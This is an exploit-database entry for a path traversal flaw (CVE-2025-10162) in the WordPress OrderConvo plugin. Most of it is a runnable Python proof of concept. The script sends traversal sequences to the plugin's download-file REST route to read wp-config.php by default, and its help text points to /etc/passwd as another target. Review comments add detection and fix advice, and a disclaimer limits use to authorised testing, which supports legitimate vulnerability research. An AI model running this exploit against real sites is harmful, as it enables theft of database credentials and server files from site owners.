
WordPress OrderConvo 14 – Path Traversal

Categories: WebApps

WordPress OrderConvo 14 – Path Traversal

Proof of Concept (PoC)

poc.py
# Exploit Title: WordPress OrderConvo 14 - Path Traversal
# Date: 05-31-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.najeebmedia.com/ 
# Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
# Version: 13.5
# Tested on: Debian
# CVE : CVE-2025-10162

import httpx
import asyncio
import argparse
from urllib.parse import urljoin
import sys


async def main(base_url: str, file: str) -> None:
	"""Probe the target, then request one file through the plugin's REST download route.

	Two requests are made on a single client: a GET to ``base_url`` as a liveness
	check, then a GET to ``wp-json/wooconvo/v1/download-file`` with the caller's
	``file`` value passed unmodified in the ``filename`` query parameter. Whatever
	the server returns in the body is printed; an empty body is reported as
	"Unable to read file".

	From the defender's side the point of interest is the ``filename`` parameter:
	the CVE header and the traversal default imply the endpoint joins it onto a
	filesystem path without confining the result to the upload directory (not
	verifiable from this script — confirm against the plugin source). Requests to
	that route whose ``filename`` contains ``..`` or a path separator are a clear
	detection signal; the fix belongs server-side (canonicalise and confine the
	path, and tie the download to an authenticated owner of ``order_id``).

	Args:
		base_url: Site root, e.g. ``https://host``. Passed to ``urljoin`` below, so
			a base without a trailing slash that carries a path component will have
			its last segment replaced rather than appended.
		file: Value sent verbatim as the ``filename`` query parameter.

	Returns:
		None. Exits the process via ``sys.exit()`` when the probe fails.
	"""
	# verify=False disables TLS certificate validation for both requests.
	async with httpx.AsyncClient(verify=False) as client:
		try:
			print('[*] Checking connection to target')
			req = await client.get(url=base_url)
			if req.status_code == 200:
				# NOTE(review): "exploitingn" is a runtime string; looks like a lost
				# "\n" escape. Left as-is here — changing it would alter output.
				print('[+] The target is alive, exploitingn')
			else:
				print(f'[-] Unable to connect to the target. Code: {req.status_code}')
				sys.exit()
		# NOTE(review): the bare except also catches the SystemExit raised by the
		# sys.exit() just above, so a non-200 probe prints both messages before
		# exiting. `except httpx.HTTPError:` would scope this to transport errors.
		except:
			print(f'[-] Problem with connection to the target.')
			sys.exit()
	
		# Build the REST route with the user-supplied filename; nothing here
		# encodes or normalises `file`, so it reaches the server exactly as given.
		exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
		r = await client.get(url=exp_url)
		# Any non-empty body is treated as success; the status code is not checked,
		# so an HTML error page would be printed as if it were file content.
		if len(r.text) != 0:
			print(r.text)
		else:
			print("[*] Unable to read file")

# Command-line interface. Built and parsed at module import time rather than
# under the __main__ guard, so importing this file as a module would also
# parse sys.argv and exit on a missing -u.
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")

parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")

# Parsed once here; main() receives args.url and args.filename positionally.
args = parser.parse_args()

# Entry point: drive the coroutine to completion on a fresh event loop.
if __name__ == '__main__':
	asyncio.run(main(args.url, args.filename))

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.
